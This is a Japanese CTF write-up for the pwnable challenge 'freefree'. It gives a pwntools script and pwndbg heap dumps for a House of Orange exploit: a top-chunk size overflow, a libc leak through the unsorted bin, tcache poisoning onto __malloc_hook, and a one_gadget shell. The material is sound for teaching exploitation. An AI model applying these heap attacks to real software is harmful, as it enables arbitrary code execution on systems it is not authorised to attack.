解題 pwnable – freefree より。
gdb (pwndbg) を使って heap を可視化。
House of Orange での heap の状態変化を追う。
python にて freefree を実行し gdb でアタッチする。
from pwn import *
elf = context.binary = ELF("./freefree")
p = process(elf.path)
gdb.attach(
p,
"""
set follow-fork-mode child
break execve
continue
""",
)
def malloc(var, size):
p.sendlineafter(b"> ", f"{var}=malloc({size})".encode())
def gets(var, data):
p.sendlineafter(b"> ", f"gets({var})".encode())
p.sendline(data)
def puts(var):
p.sendlineafter(b"> ", f"puts({var})".encode())
return p.recvline()[:-1]
malloc("A", 0x10)
input("pause 1, Enter to continue.")
gets("A", b"a" * 0x18 + pack(0xD51))
input("pause 2, Enter to continue.")
malloc("B", 0xD30)
input("pause 3, Enter to continue.")
malloc("C", 0xD20)
input("pause 4, Enter to continue.")1. libc_base のリーク
方針としては House of Orange で free した旧 Top 領域を malloc で狙って割り当て、その領域の fd (unsorted bin) を読み込むことで libc_base をリークする。
まずは chunk A を確保。# malloc(“A”, 0x10)
最初の Size 0x290 の領域は tcache とのこと。全体で 0x21000 が確保されている。
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaa000
Size: 0x290 (with flag bits: 0x291)
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaa290
Size: 0x20 (with flag bits: 0x21)
Top chunk | PREV_INUSE
Addr: 0x583afdcaa2b0
Size: 0x20d50 (with flag bits: 0x20d51)bof により後続の top の size を上書き修正。# gets(“A”, b”a” * 0x18 + pack(0xD51))
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaa000
Size: 0x290 (with flag bits: 0x291)
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaa290
Size: 0x20 (with flag bits: 0x21)
Top chunk | PREV_INUSE
Addr: 0x583afdcaa2b0
Size: 0xd50 (with flag bits: 0xd51)その状態で chunk B (size: 0xD40) を確保。# malloc(“B”, 0xD30)
Top chunk が unsortedbin に入った。
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaa000
Size: 0x290 (with flag bits: 0x291)
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaa290
Size: 0x20 (with flag bits: 0x21)
Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x583afdcaa2b0
Size: 0xd30 (with flag bits: 0xd31)
fd: 0x7060a781ace0
bk: 0x7060a781ace0
Allocated chunk
Addr: 0x583afdcaafe0
Size: 0x10 (with flag bits: 0x10)
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaaff0
Size: 0x10 (with flag bits: 0x11)
Allocated chunk
Addr: 0x583afdcab000
Size: 0x00 (with flag bits: 0x00)B はどこに行ったかというとこちら。オフセットでいうと +0x21000 の位置。
pwndbg> x/8x 0x583afdccb000
0x583afdccb000: 0x00000000 0x00000000 0x00000d41 0x00000000
0x583afdccb010: 0x00000000 0x00000000 0x00000000 0x00000000さらに chunk C (size: 0xD30) を確保。# malloc(“C”, 0xD20)
旧 Top chunk を確保
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaa000
Size: 0x290 (with flag bits: 0x291)
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaa290
Size: 0x20 (with flag bits: 0x21)
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaa2b0
Size: 0xd30 (with flag bits: 0xd31)
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaafe0
Size: 0x10 (with flag bits: 0x11)
Allocated chunk | PREV_INUSE
Addr: 0x583afdcaaff0
Size: 0x10 (with flag bits: 0x11)
Allocated chunk
Addr: 0x583afdcab000
Size: 0x00 (with flag bits: 0x00)chunk C はもともと unsorted bins に繋がれていたため、fd: 0x7060a781ace0 が記録されている。これは main_arena から +0x60 の位置になっているため、libc-2.31 の先頭から main_arena へのオフセットが 0x1ebb80 であることを踏まえ、libc_base は以下となる。
unsort = unpack(puts('C').ljust(8, b'\0'))
libc_base = unsort - (0x1ebb80 + 0x60)2. malloc_hook への one_gadget 書き込み
次に malloc_hook に libc-2.31 の one_gadget (0xe6aee) を書き込むことを考える。
方針としては、新たに chunk D を獲得し、その後続領域を House of Orange で free し tcache へ格納させ、さらにその後続領域の fd に該当する部分に malloc_hook のアドレスを書き込む。
そしてその後続領域を malloc で chunk F として確保すると tcache の fd が malloc_hook になるのでそれを chunk G として確保し one_gadget を書き込む。
まずは chunk D と chunk E を獲得し、その後続領域を House of Orange で tcache に格納させる。なお、glibc 2.28 以降の tcache 個数チェックを回避するため tcache が 2 つ要る。
gets("B", b"b" * 0xD38 + pack(0x2C1))
malloc("D", 0xD30)
gets("D", b"d" * 0xD38 + pack(0x2C1))
malloc("E", 0x2A0)chunk D の後続領域 (のちの F である) に malloc_hook のアドレスを書き込む。なお、fenceposts 0x20 分を考え、サイズは 2A0 にする。
libc = ELF("libc-2.31.so")
libc.address = libc_base
gets("D", b"d" * 0xD38 + pack(0x2A1) + pack(libc.symbols.__malloc_hook))chunk F として chunk D の後続領域を確保し、続けて chunk G として malloc_hook の実行領域を確保。
malloc("F", 0x290)
malloc("G", 0x290)malloc_hook 実行領域に one_gadget を書き込む。
one_gadget = libc_base + 0xE6AEE
print(f"one_gadget: {hex(one_gadget)}")
gets("G", pack(one_gadget))3. 仕上げ
最後に引っ掛かりポイントがある。libc 2.31 の one_gadget 0xe6aee には実行条件として r12 == NULL がある。
$ one_gadget libc-2.31.so
0xe6aee execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL || r15 is a valid argv
[r12] == NULL || r12 == NULL || r12 is a valid envpghidra で確認すると CALL variable と CALL malloc の間がこんな処理になっている。
00001358 e8 d7 fe CALL variable undefined variable()
ff ff
0000135d 41 89 c4 MOV R12D,EAX
00001360 48 89 df MOV RDI,RBX
00001363 e8 28 fd CALL <EXTERNAL>::malloc void * malloc(size_t __size)
ff ffCALL variable の結果が RAX (EAX) に入り、それが R12D に格納されているので、variable の return 値が 0 になっていればよい。ソースコードから variable 関数の処理内容を確認し、以下である必要があることがわかる。
malloc("A", 0x10)